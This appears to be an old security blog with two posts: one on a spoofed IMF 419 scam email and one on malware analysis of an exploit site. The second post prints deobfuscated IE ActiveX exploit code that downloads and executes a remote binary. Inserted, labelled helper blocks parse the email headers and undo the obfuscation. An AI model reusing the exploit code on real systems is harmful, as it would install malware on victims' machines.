419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.
The email is spoofed from Mr. Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP 58.63.81.97. The email requests that replies go to imfec@in.com.
Delivered-To: xxx@gmail.com
Received: by 10.86.95.1 with SMTP id s1cs313745fgb; Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by 10.114.145.1 with SMTP id s1mr2802117wad.118.1229798166053; Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Return-Path:
Received: from pfyq6 ([58.63.81.97]) by mx.google.com with SMTP id k21si16564504waf.32.2008.12.20.10.36.04; Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) client-ip=58.63.81.97;
Authentication-Results: mx.google.com; spf=neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) smtp.mail=imf@imf.org
Message-Id: <494d3b16.15bb720a.7b0f.009fsmtpin_added@mx.google.com>
From: "Mr.Dominique Strauss-Kahn"
Subject: ECONOMIC STORM
To: xxx@gmail.com
Content-Type: text/plain; charset="US-ASCII"
Reply-To: imfec@in.com
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3
This is to inform you/your company that IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world. These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion United State Dollars ) to finance individuals/companies around the globe who have a reasonable project. All applicant should send their full data and project details (project name, project purpose,project cost) to the address given below to apply the support for your project.
Reply to Mr. John Condo Project Finance Section IMF Office Beijing China ( http://www.imf.org/external/np/omd/bios/rrf.htm ) Email imfec@in.com
Yours sincerely, Mr.Dominique Strauss-Kahn Managing Director, IMF
The email attempts to validate itself by including a hyperlink to the bio of Mr. Dominique Strauss-Kahn. The only problem is that the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was Managing Director from June 7, 2004 to October 31, 2007.
Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. You wouldn't think it's that profitable, but every once in a while the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is I'm looking forward to my slice of the $10 Billion. WoooHooo!!!
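The tells in the headers above (a Reply-To at a different domain than the claimed sender, an SPF result that is only "neutral", and a connecting IP unrelated to imf.org) can be pulled out mechanically. This is an added triage helper, not code from the original post; the sample is a constructed subset of the headers quoted above, with the From header left without an address exactly as the page shows it, so the sender domain falls back to the smtp.mail value recorded by the receiving MTA.

```javascript
// Added triage helper (not from the original post): unfold raw headers and
// flag Reply-To mismatch, non-"pass" SPF, and the IP that handed the mail in.
function parseHeaders(raw) {
  const headers = [];
  for (const line of raw.split(/\r?\n/)) {
    if (/^[ \t]/.test(line) && headers.length) {
      headers[headers.length - 1].value += ' ' + line.trim(); // unfold continuation
    } else {
      const m = /^([A-Za-z0-9-]+):\s*(.*)$/.exec(line);
      if (m) headers.push({ name: m[1].toLowerCase(), value: m[2] });
    }
  }
  return headers;
}
function domainOf(s) {
  const m = /@([A-Za-z0-9.-]+)/.exec(s || '');
  return m ? m[1].toLowerCase() : null;
}
function triage(raw) {
  const h = parseHeaders(raw);
  const get = n => (h.find(x => x.name === n) || {}).value;
  // Envelope sender as recorded by the receiving MTA (smtp.mail=...).
  const env = /smtp\.mail=([^\s;]+)/.exec(get('authentication-results') || '');
  const senderDomain = domainOf(get('from')) || domainOf(env && env[1]);
  const replyDomain = domainOf(get('reply-to'));
  const spf = /^(\w+)/.exec(get('received-spf') || '');
  // The bottom-most "Received: from ... ([ip])" hop is the sender's connection.
  const hops = h.filter(x => x.name === 'received').map(x => x.value);
  const ip = /\[(\d{1,3}(?:\.\d{1,3}){3})\]/.exec(hops[hops.length - 1] || '');
  return {
    senderDomain, replyDomain,
    replyToMismatch: !!replyDomain && replyDomain !== senderDomain,
    spfResult: spf ? spf[1].toLowerCase() : 'none',
    spfPassed: !!spf && spf[1].toLowerCase() === 'pass',
    originIp: ip ? ip[1] : null,
  };
}
// Constructed sample: the headers quoted above, trimmed to those used here.
const SAMPLE = [
  'Received: by 10.86.95.1 with SMTP id s1cs313745fgb; Sat, 20 Dec 2008 10:36:07 -0800 (PST)',
  'Received: from pfyq6 ([58.63.81.97]) by mx.google.com with SMTP id k21si16564504waf.32.2008.12.20.10.36.04;',
  '\tSat, 20 Dec 2008 10:36:06 -0800 (PST)',
  'Received-SPF: neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) client-ip=58.63.81.97;',
  'Authentication-Results: mx.google.com; spf=neutral (...) smtp.mail=imf@imf.org',
  'From: "Mr.Dominique Strauss-Kahn"',
  'Reply-To: imfec@in.com',
].join('\n');
```

Running triage(SAMPLE) reports sender domain imf.org against Reply-To domain in.com, SPF neutral, and origin IP 58.63.81.97.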
The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...
A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.
The JavaScript replace() method is used to obfuscate the exploit code. The replace() method syntax is
stringObject.replace(findstring,newstring)
A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.
Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ''. The decoded section returns a string of escaped hexadecimal characters.
The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.
az = new Array();
az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
for(i = 0; i <= az.length - 1; i++){
  start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
}
function start(sUrl, sPath) {
  var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  try {
    var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
    var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
    var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
    try {
      t.type = 1;
      q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);
      q.send();
      t.open();
      t.write(q.responseBody);
      t.savetofile(sPath,2);
      t.close();
    } catch(e) {}
    try {
      s.shellexecute(sPath);
      if(shellexecute=true) {
        var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
        b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random());
        b.send(null);
      }
    } catch(e){}
  } catch(e){}
}
Exploit Block 2
The second block of exploit code uses the same obfuscation technique, decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code.
The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().
function killErrors() { return true; }
window.onerror = killErrors;
var x;
var obj;
var myarr = new Array();
myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';
myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';
myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';
setTimeout('window.location = "ldap://127.0.0.1"', 5000);
for (x in myarr){
  obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  try{
    var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();
    var buf2 = myarr[x];
    obj.Zoom = 0;
    obj.SnapshotPath = buf1;
    obj.CompressedPath = buf2;
    obj.PrintSnapshot();
  }catch(e){}
}
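Blocks 1 and 2 hide every string literal behind the same replace() trick, and block 1 wraps that in two more layers (a Tgwm token removed globally, then a string of escaped hex). An analyst reversing this does not need to run the script; the layers are plain string transforms. The helper below is an added example, not code from the page or from the exploit kit; the three sample literals are copied from the blocks above and the Tgwm token is the one the page names.

```javascript
// Added analysis helper (not from the page's exploit code): reverses the
// replace()-based obfuscation used by Exploit Blocks 1 and 2, then pulls
// URLs and CLSIDs out of the result for triage.
const JUNK = /[!@#$%^&*()]/g;   // same set as /\!|@|#|\$|%|\^|&|\*|\(|\)/ig

// Layer used by every string literal in blocks 1 and 2.
function stripJunk(s) {
  return s.replace(JUNK, '');
}

// Outer layer of block 1: a fixed token ("Tgwm") is removed globally.
function stripToken(s, token) {
  const esc = token.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');   // literal match
  return s.replace(new RegExp(esc, 'g'), '');
}

// Middle layer of block 1: the stripped text is a run of %XX / %uXXXX escapes.
function decodeEscapes(s) {
  const ch = (_, h) => String.fromCharCode(parseInt(h, 16));
  return s.replace(/%u([0-9a-f]{4})/gi, ch).replace(/%([0-9a-f]{2})/gi, ch);
}

// Indicators worth blocking or hunting for once the text is readable.
function extractIndicators(text) {
  return {
    urls: text.match(/https?:\/\/[^\s'"]+/g) || [],
    clsids: text.match(/clsid:[0-9A-F-]{36}/gi) || [],
  };
}

// Constructed sample: three obfuscated literals copied from blocks 1 and 2.
const SAMPLES = [
  'o&b!j))e*ct!',
  'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$',
  'snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$',
];

function decodeSamples() {
  return SAMPLES.map(stripJunk);
}
```

The CLSID that falls out of the second sample is the RDS.DataSpace control named in the MS06-014 description above, which is the value a detection rule should key on rather than the junk-laden literal.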
Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeting a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader's JavaScript engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12, which provides desktop publishing for Linux/Unix. Scribus provides a step-by-step guide for beginning to enhance PDFs with JavaScript. The creation date is 8-6-08.
13 0 obj <> Stream
[filter FlateDecode has been applied to the JavaScript bitstream]
The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).
aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB
SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp, an international communications company headquartered in London, UK.
Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) 67.228.139.0 - 67.228.139.127
SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners, and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both Innovation IT Solutions Corp and SOFTLAYER Technologies Inc have previously been tied to RBN activity and the Russian cyberwar on Georgia.